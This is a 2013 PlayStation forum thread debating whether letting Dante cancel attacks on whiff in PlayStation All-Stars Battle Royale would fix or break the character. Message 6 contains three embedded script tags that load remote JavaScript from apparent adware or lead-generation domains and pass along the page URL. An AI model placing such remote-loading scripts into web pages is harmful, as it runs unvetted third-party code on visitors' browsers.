Mar 05 2013
By: Breaker_Ki Sackboy 528 posts

Would this fix Dante or break him?

23 replies 397 views Edited Mar 5, 2013
Allow Dante to cancel on whiff. This would allow him to parry or dash on whiff.

This would fix a lot of the issues he has, but would doing this make him too good and just break things?
Message 1 of 24 (397 Views)
Wastelander
578 posts

Re: Would this fix Dante or break him?

Mar 5, 2013
If I could cancel on whiff...? Oh, that makes me all tingly.
Hard to say, but I think that would open up some serious mindgames for Dante. Being able to dash behind a blocking opponent or counter their retaliation would be amazing.
It might border on broken, maybe, but perhaps not, since Angel Boost has no invincibility frames. Still, that alone would make him considerably more formidable.
 photo psasbrsig_zpsdfbc77fd.jpg
Message 2 of 24 (342 Views)
0 Likes
Lombax Warrior
233 posts

Mar 5, 2013
I like this idea. It forces the opponent to strategize with their retaliation options.

"Is he gonna dash away, or parry? If I try to grab assuming he'll parru, he might dash away and start a new combo."

However, if this were the case, then his pro cancel would make him broken, as he'd be able to do it at any time, allowing an abusive player to never get hit.
Message 3 of 24 (334 Views)
0 Likes
Gaming Beast
1776 posts

[ Edited ]
Mar 5, 2013

Not really sure.

On one hand, if Dante could cancel on whiff, then you could argue that he would basically be untouchable because he could cancel into Triangle and then side circle to just dodge all attacks. Plus wouldn't that mean he'd basically have unlimited dashes, since he can just cancel out of thin air?

But on the other hand, you could argue that there is a small opportunity to hit Dante in the moment when he has pressed triangle and is about to cancel into side Dash, since Dante's guns don't cause hitstun. Still though, most Dante's are pretty fast with the cancelling, and you might still be in guard recovery anyway.

This would probably cause more bad than good. I'd prefer to see Dante have less recovery on his square attacks since they're so vital to his gameplay. It's really jarring how much recovery Dante has on his square attacks compared to everyone else in the game.

Message 4 of 24 (322 Views)
Wastelander
578 posts

Mar 5, 2013
^ Not to mention the most I can throw at someone if they try and interrupt a square chain from behind is a reversed high time or tremor. He's probably the only one who can't even turn around. >__>
 photo psasbrsig_zpsdfbc77fd.jpg
Message 5 of 24 (316 Views)
0 Likes
Gaming Beast
2167 posts

Mar 5, 2013
Depends... is this JUST on whiff or also on block?

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 6 of 24 (296 Views)
0 Likes
Uncharted Territory
1808 posts

Mar 5, 2013
That'd make him better in my opinion. Definitely wouldn't make him op, but it'd at least give him some more options all around.

See more on Know Your Meme
Message 7 of 24 (290 Views)
0 Likes
Sackboy
528 posts

Mar 5, 2013
Originally I figured on whiff only. However after considering some odd scenarios where the 1st and 2nd swing whiff and the 3rd is blocked then it would have to be allow cancel on both block and whiff.

I feel this would address how open he is uniquely compared to say Kratos who has near zero recovery. Now, allowing this may mean other things need to be adjusted.
Message 8 of 24 (228 Views)
0 Likes
Fender Bender
2538 posts

Mar 5, 2013
I propose giving his guns a little hit stun. That way if he whiffs, or even wants to start a safe combo, he can cancel into triangle, then to circle.
Message 9 of 24 (201 Views)
0 Likes
Fender Bender
3659 posts

Mar 5, 2013

Am I the only one who doesn't know what you lot mean by "Whiif"?

Where I'm from it's another word for a bad stench, commonly because of a fart.

So should Dantes be able to cancel his attacks when he farts? Sure...why not...

Message 10 of 24 (189 Views)
0 Likes